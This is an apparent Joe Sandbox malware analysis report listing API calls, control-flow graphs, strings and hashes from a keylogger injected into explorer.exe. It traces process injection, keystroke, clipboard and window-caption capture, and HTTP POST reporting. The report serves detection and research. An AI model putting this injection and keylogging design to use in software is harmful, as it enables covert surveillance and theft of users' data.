                                    APIs
                                      • Part of subcall function 000C2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,000C29F3,-00000001,000C128C), ref: 000C2731
                                      • Part of subcall function 000C2A09: GetProcessHeap.KERNEL32(00000008,0000A000,000C10BF), ref: 000C2A0C
                                      • Part of subcall function 000C2A09: RtlAllocateHeap.NTDLL(00000000), ref: 000C2A13
                                    • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 000C1038
                                    • RtlMoveMemory.NTDLL(00000000,?,?), ref: 000C106C
                                    • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 000C1075
                                    • GetCurrentProcessId.KERNEL32(?,000C1010), ref: 000C107B
                                    • wsprintfA.USER32 ref: 000C10E7
                                    • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 000C1155
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000C1160
                                    • Process32First.KERNEL32(00000000,?), ref: 000C117F
                                    • CharLowerA.USER32(?), ref: 000C1199
                                    • lstrcmpi.KERNEL32(?,explorer.exe), ref: 000C11B5
                                    • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000C1212
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000C126C
                                    • CloseHandle.KERNELBASE(00000000), ref: 000C127F
                                    • Sleep.KERNELBASE(000003E8), ref: 000C129F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c1000_explorer.jbxd
                                    Similarity
                                    • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                    • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                    • API String ID: 3206029838-2805246637
                                    • Opcode ID: 99e3216da8f4614e5ef2b12c6cbcb6366dd348c3966ad96c1822504ed2a13e78
                                    • Instruction ID: 0e9037b1a23d498d9eef44ef847a7222ad4cab352246f22d42649b873d6f71e1
                                    • Opcode Fuzzy Hash: 99e3216da8f4614e5ef2b12c6cbcb6366dd348c3966ad96c1822504ed2a13e78
                                    • Instruction Fuzzy Hash: 235114352147019BE714EF74DC98FFE37E9EB45300F10462CB942872E3DB389A458A62

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 000C2A09: GetProcessHeap.KERNEL32(00000008,0000A000,000C10BF), ref: 000C2A0C
                                      • Part of subcall function 000C2A09: RtlAllocateHeap.NTDLL(00000000), ref: 000C2A13
                                    • wsprintfA.USER32 ref: 000C10E7
                                      • Part of subcall function 000C276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 000C2777
                                      • Part of subcall function 000C276D: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,000C10FE), ref: 000C2789
                                    • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 000C1155
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000C1160
                                    • Process32First.KERNEL32(00000000,?), ref: 000C117F
                                    • CharLowerA.USER32(?), ref: 000C1199
                                    • lstrcmpi.KERNEL32(?,explorer.exe), ref: 000C11B5
                                    • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000C1212
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000C126C
                                    • CloseHandle.KERNELBASE(00000000), ref: 000C127F
                                    • Sleep.KERNELBASE(000003E8), ref: 000C129F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c1000_explorer.jbxd
                                    Similarity
                                    • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                    • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                    • API String ID: 3018447944-2805246637
                                    • Opcode ID: 9deb01827ac776a51df14ae706493a07813ed851d989cd2001199b3ce524d063
                                    • Instruction ID: 65a32b94eeba30fb37388cade614e901b3f724369e7f64ce63652e8e70c925c7
                                    • Opcode Fuzzy Hash: 9deb01827ac776a51df14ae706493a07813ed851d989cd2001199b3ce524d063
                                    • Instruction Fuzzy Hash: 6341F5352143019BE714EF649C95FFE73E9EB89740F00462CB942972D3EF389E0A8A61

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 122 c9ae0-c9ae5 123 c9cad 122->123 124 c9aeb-c9af8 122->124 123->123 125 c9b0a-c9b0f 124->125 126 c9b11 125->126 127 c9b00-c9b05 126->127 128 c9b13 126->128 129 c9b06-c9b08 127->129 130 c9b18-c9b1a 128->130 129->125 129->126 131 c9b1c-c9b21 130->131 132 c9b23-c9b27 130->132 131->132 132->130 133 c9b29 132->133 134 c9b2b-c9b32 133->134 135 c9b34-c9b39 133->135 134->130 134->135 136 c9b48-c9b4a 135->136 137 c9b3b-c9b44 135->137 140 c9b4c-c9b51 136->140 141 c9b53-c9b57 136->141 138 c9bba-c9bbd 137->138 139 c9b46 137->139 142 c9bc2-c9bc5 138->142 139->136 140->141 143 c9b59-c9b5e 141->143 144 c9b60-c9b62 141->144 145 c9bc7-c9bc9 142->145 143->144 146 c9b84-c9b93 144->146 147 c9b64 144->147 145->142 150 c9bcb-c9bce 145->150 148 c9ba4-c9bb1 146->148 149 c9b95-c9b9c 146->149 151 c9b65-c9b67 147->151 148->148 153 c9bb3-c9bb5 148->153 149->149 152 c9b9e 149->152 150->142 154 c9bd0-c9bec 150->154 155 c9b69-c9b6e 151->155 156 c9b70-c9b74 151->156 152->129 153->129 154->145 157 c9bee 154->157 155->156 156->151 158 c9b76 156->158 159 c9bf4-c9bf8 157->159 160 c9b78-c9b7f 158->160 161 c9b81 158->161 162 c9c3f-c9c42 159->162 163 c9bfa-c9c10 LoadLibraryA 159->163 160->151 160->161 161->146 164 c9c45-c9c4c 162->164 165 c9c11-c9c16 163->165 166 c9c4e-c9c50 164->166 167 c9c70-c9ca0 VirtualProtect * 2 164->167 165->159 168 c9c18-c9c1a 165->168 169 c9c52-c9c61 166->169 170 c9c63-c9c6e 166->170 171 c9ca4-c9ca8 167->171 172 c9c1c-c9c22 168->172 173 c9c23-c9c30 GetProcAddress 168->173 169->164 170->169 171->171 176 c9caa 171->176 172->173 174 c9c39-c9c3c 173->174 175 c9c32-c9c37 173->175 175->165 176->123
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C8000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c8000_explorer.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5a90a3da1134cbd6d7394e945c6328cb317c31726ecd2c7108728ae9c5fb7b2a
                                    • Instruction ID: 5d373d380bc8d33ca3e460cf90b4df01c8f54fbf82947dc495f7be0379535973
                                    • Opcode Fuzzy Hash: 5a90a3da1134cbd6d7394e945c6328cb317c31726ecd2c7108728ae9c5fb7b2a
                                    • Instruction Fuzzy Hash: DF5106B1A442526AD7218B78DDC8FADB7E4EB51320B28073DD5E6CB3C6E7945C06C7A0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 177 c276d-c277f OpenFileMappingA 178 c2794-c2798 177->178 179 c2781-c2791 MapViewOfFile 177->179 179->178
                                    APIs
                                    • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 000C2777
                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,000C10FE), ref: 000C2789
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c1000_explorer.jbxd
                                    Similarity
                                    • API ID: File$MappingOpenView
                                    • String ID:
                                    • API String ID: 3439327939-0
                                    • Opcode ID: a635665d7b2318b096fc45d1b7df7a032460b18c1cdb8dc854a067880cfac442
                                    • Instruction ID: f61162d414438c38522cd182f7daa421870211b257a0bea1096e69927b45a71d
                                    • Opcode Fuzzy Hash: a635665d7b2318b096fc45d1b7df7a032460b18c1cdb8dc854a067880cfac442
                                    • Instruction Fuzzy Hash: A4D0E232715221ABE2746BBA6C0CF87AE9DDF86AA1B114125B50DD2150D6648810C2B0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 180 c2a09-c2a19 GetProcessHeap RtlAllocateHeap
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,0000A000,000C10BF), ref: 000C2A0C
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C2A13
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c1000_explorer.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateProcess
                                    • String ID:
                                    • API String ID: 1357844191-0
                                    • Opcode ID: acd67665e468933ac110cf8aaf04359a017c7f809d1efca19bac9904b56a1078
                                    • Instruction ID: 44ddc3e53d7fc330c908ae40a164f077d9b6d1530eb3605bc688a08ab2fa2283
                                    • Opcode Fuzzy Hash: acd67665e468933ac110cf8aaf04359a017c7f809d1efca19bac9904b56a1078
                                    • Instruction Fuzzy Hash: C2A002B26601006BFD4457E49D1DF157658B744701F10C5447246C50509D7955448721

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 181 c29bd-c29cd VirtualAlloc
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,000C12D9,00000000,00000000,?,00000001), ref: 000C29C7
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c1000_explorer.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 71e878e75d6082f9d5ba38c0e3662c3b0d55d339f5071642929824413c13a8ed
                                    • Instruction ID: 4d509c70b3cc56080b4199e8b3182924645f0e14b97ef127793cfc853709a618
                                    • Opcode Fuzzy Hash: 71e878e75d6082f9d5ba38c0e3662c3b0d55d339f5071642929824413c13a8ed
                                    • Instruction Fuzzy Hash: 85A002B17E5300BAFD69A7519D2FF153A189740F02F208145B30A7C1D056E8B600893D

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 182 c29ae-c29bc VirtualFree
                                    APIs
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,000C13A4), ref: 000C29B6
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c1000_explorer.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-0
                                    • Opcode ID: db50c5d8a102c95c7d20eb5ab4ef99f45e466021c69ff63b6bb9e1a799fb318c
                                    • Instruction ID: 31dd2fa8e07d9bb98dafe1dc03b535656cc5c0c6ad4852bd1be97c2afe809df2
                                    • Opcode Fuzzy Hash: db50c5d8a102c95c7d20eb5ab4ef99f45e466021c69ff63b6bb9e1a799fb318c
                                    • Instruction Fuzzy Hash: 03A002717A070076FD7457605D1AF0576547740B02F3085447245A80D049A9A1488A18

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 000C2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,000C29F3,-00000001,000C128C), ref: 000C2731
                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 000C18F4
                                    • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 000C192F
                                    • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 000C19BF
                                    • RtlMoveMemory.NTDLL(00000000,000C3638,00000016), ref: 000C19E6
                                    • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 000C1A0E
                                    • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 000C1A1E
                                    • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C1A38
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 000C1A40
                                    • CloseHandle.KERNEL32(00000000), ref: 000C1A4E
                                    • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000C1A55
                                    • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 000C1A6B
                                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000C1A72
                                    • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000C1A88
                                    • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000C1AB2
                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C1AC5
                                    • CloseHandle.KERNEL32(00000000), ref: 000C1ACC
                                    • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000C1AD3
                                    • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000C1AE7
                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 000C1AFE
                                    • CloseHandle.KERNEL32(00000000), ref: 000C1B0B
                                    • CloseHandle.KERNEL32(?), ref: 000C1B11
                                    • CloseHandle.KERNEL32(?), ref: 000C1B17
                                    • CloseHandle.KERNEL32(00000000), ref: 000C1B1A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c1000_explorer.jbxd
                                    Similarity
                                    • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                    • String ID: atan$ntdll$opera_shared_counter
                                    • API String ID: 1066286714-2737717697
                                    • Opcode ID: 9e424bfddfcf2250cd6ecd80b675fed99075bf222c9483c73a16eac78e681340
                                    • Instruction ID: abebfd9c9de8a5803ea088a1e7a5a8bc147661f29964b982ce2a24cbbf0e8576
                                    • Opcode Fuzzy Hash: 9e424bfddfcf2250cd6ecd80b675fed99075bf222c9483c73a16eac78e681340
                                    • Instruction Fuzzy Hash: EA616A72204305AFE710DB649C84EAFBBECEB8A754F10451DF94993292DB74DE048BA2

                                    Control-flow Graph

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000C27B5
                                    • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000C27CD
                                    • lstrlen.KERNEL32(?,00000000), ref: 000C27D5
                                    • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000C27E0
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000C27FA
                                    • wsprintfA.USER32 ref: 000C2811
                                    • CryptDestroyHash.ADVAPI32(?), ref: 000C282A
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 000C2834
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c1000_explorer.jbxd
                                    Similarity
                                    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                    • String ID: %02X
                                    • API String ID: 3341110664-436463671
                                    • Opcode ID: fd74d833290c78547abcf1de5dffbf351a85f34bb6135ab56120f26d07ed3cd1
                                    • Instruction ID: 02fc7693972bb534bd5ff68773a41b3fc752aac871128042c803a7d2e0d72131
                                    • Opcode Fuzzy Hash: fd74d833290c78547abcf1de5dffbf351a85f34bb6135ab56120f26d07ed3cd1
                                    • Instruction Fuzzy Hash: 68113D72900108BFEB119B95EC88FEEBFBCEB48711F208065FA05E2160DB754F459B60
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 000C1652
                                    • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 000C167A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c1000_explorer.jbxd
                                    Similarity
                                    • API ID: KeyboardStateUnicode
                                    • String ID:
                                    • API String ID: 3453085656-3916222277
                                    • Opcode ID: c7f5e0c05c983241755568638e6dd1c75d03a30b827a3dd7953169309d4b6611
                                    • Instruction ID: 2d71e2b6ea4b624a9cbae3ef7ccfe3706d6ea43bfabe9a87450ac1a19cf092a0
                                    • Opcode Fuzzy Hash: c7f5e0c05c983241755568638e6dd1c75d03a30b827a3dd7953169309d4b6611
                                    • Instruction Fuzzy Hash: 650161329002199BEB34DB64DD45FFF73BCAF46700F08841EE901E2152D734E9459AA1

                                    Control-flow Graph

                                    APIs
                                    • RtlZeroMemory.NTDLL(000C5013,0000001C), ref: 000C13C8
                                    • VirtualQuery.KERNEL32(000C13AE,?,0000001C), ref: 000C13DA
                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 000C140B
                                    • GetCurrentProcessId.KERNEL32(00000004), ref: 000C141C
                                    • wsprintfA.USER32 ref: 000C1433
                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 000C1448
                                    • GetLastError.KERNEL32 ref: 000C144E
                                    • RtlInitializeCriticalSection.NTDLL(000C582C), ref: 000C1465
                                    • Sleep.KERNEL32(000001F4), ref: 000C1489
                                    • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 000C14A6
                                    • GetProcAddress.KERNEL32(00000000), ref: 000C14AF
                                    • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 000C14D0
                                    • GetProcAddress.KERNEL32(00000000), ref: 000C14D3
                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000C14F1
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 000C150D
                                    • CloseHandle.KERNEL32(00000000), ref: 000C1514
                                    • RtlExitUserThread.NTDLL(00000000), ref: 000C152A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c1000_explorer.jbxd
                                    Similarity
                                    • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                    • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                    • API String ID: 3628807430-1779906909
                                    • Opcode ID: 60bfaaf54ac5fe15c88d4a82a297f1d8f0a4b47b245a6985dbd55d8607063b04
                                    • Instruction ID: 429d8b2511cd56256381a213a5eba760fd92a43267dc1a0208b5131e50701b55
                                    • Opcode Fuzzy Hash: 60bfaaf54ac5fe15c88d4a82a297f1d8f0a4b47b245a6985dbd55d8607063b04
                                    • Instruction Fuzzy Hash: 5541B475610704EBE710BFA5EC19F9F3BACFB86751B10801CF606C6292DB79E9448BA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 256 c16b9-c16cc RtlEnterCriticalSection 257 c17ce-c17db RtlLeaveCriticalSection 256->257 258 c16d2-c16e7 lstrlenW 256->258 259 c17cc-c17cd 258->259 260 c16ed-c1700 lstrlenW 258->260 259->257 261 c171e-c1721 260->261 262 c1702-c1719 call c29ce 260->262 264 c174e-c1758 GetForegroundWindow 261->264 265 c1723-c1724 261->265 262->261 264->259 268 c175a-c176f GetWindowTextW 264->268 265->259 267 c172a-c174c call c17dc wsprintfW 265->267 276 c17b6-c17bd call c29eb 267->276 270 c177a-c1789 lstrcmpW 268->270 271 c1771-c1774 GetClassNameW 268->271 273 c17bf-c17c6 lstrcatW 270->273 274 c178b-c17b3 lstrcpyW call c17dc wsprintfW 270->274 271->270 273->259 274->276 276->259
                                    APIs
                                    • RtlEnterCriticalSection.NTDLL(000C582C), ref: 000C16C4
                                    • lstrlenW.KERNEL32 ref: 000C16DB
                                    • lstrlenW.KERNEL32 ref: 000C16F3
                                    • wsprintfW.USER32 ref: 000C1743
                                    • GetForegroundWindow.USER32 ref: 000C174E
                                    • GetWindowTextW.USER32(00000000,000C5850,00000800), ref: 000C1767
                                    • GetClassNameW.USER32(00000000,000C5850,00000800), ref: 000C1774
                                    • lstrcmpW.KERNEL32(000C5020,000C5850), ref: 000C1781
                                    • lstrcpyW.KERNEL32(000C5020,000C5850), ref: 000C178D
                                    • wsprintfW.USER32 ref: 000C17AD
                                    • lstrcatW.KERNEL32 ref: 000C17C6
                                    • RtlLeaveCriticalSection.NTDLL(000C582C), ref: 000C17D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c1000_explorer.jbxd
                                    Similarity
                                    • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                    • String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
                                    • API String ID: 2651329914-3371406555
                                    • Opcode ID: c457d83e07117960512ff9d6a17b9ba568e2bd8b3c9ab155dcc0e5576c0cd205
                                    • Instruction ID: d9cfb5cf3cda6128c3be6f45b3d1eb27ed0ef66761b79a0610489f4e331d032e
                                    • Opcode Fuzzy Hash: c457d83e07117960512ff9d6a17b9ba568e2bd8b3c9ab155dcc0e5576c0cd205
                                    • Instruction Fuzzy Hash: 7B21EA35514A04AFE3212725EC49FAF3AB8EB42B56724812CF901E6163DE299D4186F1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 285 c25f1-c262f GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 286 c267d-c267f 285->286 287 c2631-c2635 286->287 288 c2681-c268e CloseHandle 286->288 289 c2637-c263b 287->289 290 c2671-c2677 Thread32Next 287->290 289->290 291 c263d-c2656 OpenThread 289->291 290->286 292 c2658-c265e SuspendThread 291->292 293 c2660 ResumeThread 291->293 294 c2666-c266d CloseHandle 292->294 293->294 294->290
                                    APIs
                                    • GetCurrentProcessId.KERNEL32 ref: 000C2603
                                    • GetCurrentThreadId.KERNEL32 ref: 000C260B
                                    • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000C261B
                                    • Thread32First.KERNEL32(00000000,0000001C), ref: 000C2629
                                    • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 000C2648
                                    • SuspendThread.KERNEL32(00000000), ref: 000C2658
                                    • CloseHandle.KERNEL32(00000000), ref: 000C2667
                                    • Thread32Next.KERNEL32(00000000,0000001C), ref: 000C2677
                                    • CloseHandle.KERNEL32(00000000), ref: 000C2682
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c1000_explorer.jbxd
                                    Similarity
                                    • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                    • String ID:
                                    • API String ID: 1467098526-0
                                    • Opcode ID: 482480d4485ccb4042bcb79c26a38b2d3f92576c04d7d6c7939b397cd361f68e
                                    • Instruction ID: 3ae33d7cffd26bcd6b12822e8c43ac7e6746d3b8ffc9d300f9efa9b112ea700d
                                    • Opcode Fuzzy Hash: 482480d4485ccb4042bcb79c26a38b2d3f92576c04d7d6c7939b397cd361f68e
                                    • Instruction Fuzzy Hash: D4117C72414300EFE7119F60AC5CF6EBAA4FF84B05F20842DFA4592150D7388A099BA3

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 295 c20a1-c20fc call c240f call c2a09 call c298a call c24cc 304 c20fe-c2115 295->304 305 c2117-c2123 295->305 308 c2127-c2129 304->308 305->308 309 c23fd-c240c call c29eb 308->309 310 c212f-c2166 RtlZeroMemory 308->310 314 c216c-c2187 310->314 315 c23f5-c23fc 310->315 316 c21b9-c21cb 314->316 317 c2189-c219a call c243d 314->317 315->309 324 c21cf-c21d1 316->324 322 c219c-c21ab 317->322 323 c21ad 317->323 325 c21af-c21b7 322->325 323->325 326 c21d7-c2233 call c288d 324->326 327 c23e2-c23e8 324->327 325->324 335 c2239-c223e 326->335 336 c23db 326->336 330 c23ea-c23ec call c29eb 327->330 331 c23f1 327->331 330->331 331->315 337 c2258-c2286 call c2a09 wsprintfW 335->337 338 c2240-c2251 335->338 336->327 341 c229f-c22b6 337->341 342 c2288-c228a 337->342 338->337 347 c22b8-c22ee call c2a09 wsprintfW 341->347 348 c22f5-c230f 341->348 343 c228b-c228e 342->343 345 c2299-c229b 343->345 346 c2290-c2295 343->346 345->341 346->343 349 c2297 346->349 347->348 353 c23b8-c23ce call c29eb 348->353 354 c2315-c2328 348->354 349->341 361 c23d7 353->361 362 c23d0-c23d2 call c29eb 353->362 354->353 358 c232e-c2344 call c2a09 354->358 365 c2346-c2351 358->365 361->336 362->361 366 c2365-c237c 365->366 367 c2353-c2360 call c29ce 365->367 371 c237e 366->371 372 c2380-c238d 366->372 367->366 371->372 372->365 373 c238f-c2393 372->373 374 c23ad-c23b4 call c29eb 373->374 375 c2395-c23a7 call c29bd RtlMoveMemory 373->375 374->353 375->374
                                    APIs
                                      • Part of subcall function 000C2A09: GetProcessHeap.KERNEL32(00000008,0000A000,000C10BF), ref: 000C2A0C
                                      • Part of subcall function 000C2A09: RtlAllocateHeap.NTDLL(00000000), ref: 000C2A13
                                      • Part of subcall function 000C298A: lstrlen.KERNEL32(000C4FE2,?,00000000,00000000,000C20DD,75712B62,000C4FE2,00000000), ref: 000C2992
                                      • Part of subcall function 000C298A: MultiByteToWideChar.KERNEL32(00000000,00000000,000C4FE2,00000001,00000000,00000000), ref: 000C29A4
                                      • Part of subcall function 000C24CC: RtlZeroMemory.NTDLL(?,00000018), ref: 000C24DE
                                    • RtlZeroMemory.NTDLL(?,0000003C), ref: 000C2139
                                    • wsprintfW.USER32 ref: 000C2272
                                    • wsprintfW.USER32 ref: 000C22DD
                                    • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000C23A7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c1000_explorer.jbxd
                                    Similarity
                                    • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                    • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                    • API String ID: 4204651544-1701262698
                                    • Opcode ID: aef6b5e180c2f1518824fd913e4bc16fbd488efc624a28f5f9e6db917ccf4602
                                    • Instruction ID: 8599106d641ffb9abdf09edb373c92b4994641701acf05219b067619d305f964
                                    • Opcode Fuzzy Hash: aef6b5e180c2f1518824fd913e4bc16fbd488efc624a28f5f9e6db917ccf4602
                                    • Instruction Fuzzy Hash: F6A16A71608341AFD350DF69D884E6FBBE8EF88740F14482DF985D7262DA78DE048B62

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 380 c12ae-c12bf 381 c12c5-c12c7 380->381 382 c13a6-c13ad 380->382 381->382 383 c12cd-c12fc call c29bd lstrlen call c2a09 381->383 388 c136e-c1377 call c29eb 383->388 389 c12fe-c1327 call c2841 RtlZeroMemory 383->389 394 c139d-c13a5 call c29ae 388->394 395 c1379-c137d 388->395 396 c1329-c134f RtlMoveMemory call c2569 389->396 397 c1353-c1369 RtlMoveMemory call c2569 389->397 394->382 398 c137f-c1392 call c255c PathMatchSpecA 395->398 396->389 406 c1351 396->406 397->388 407 c139b 398->407 408 c1394-c1397 398->408 406->388 407->394 408->398 409 c1399 408->409 409->394
                                    APIs
                                      • Part of subcall function 000C29BD: VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,000C12D9,00000000,00000000,?,00000001), ref: 000C29C7
                                    • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 000C12DC
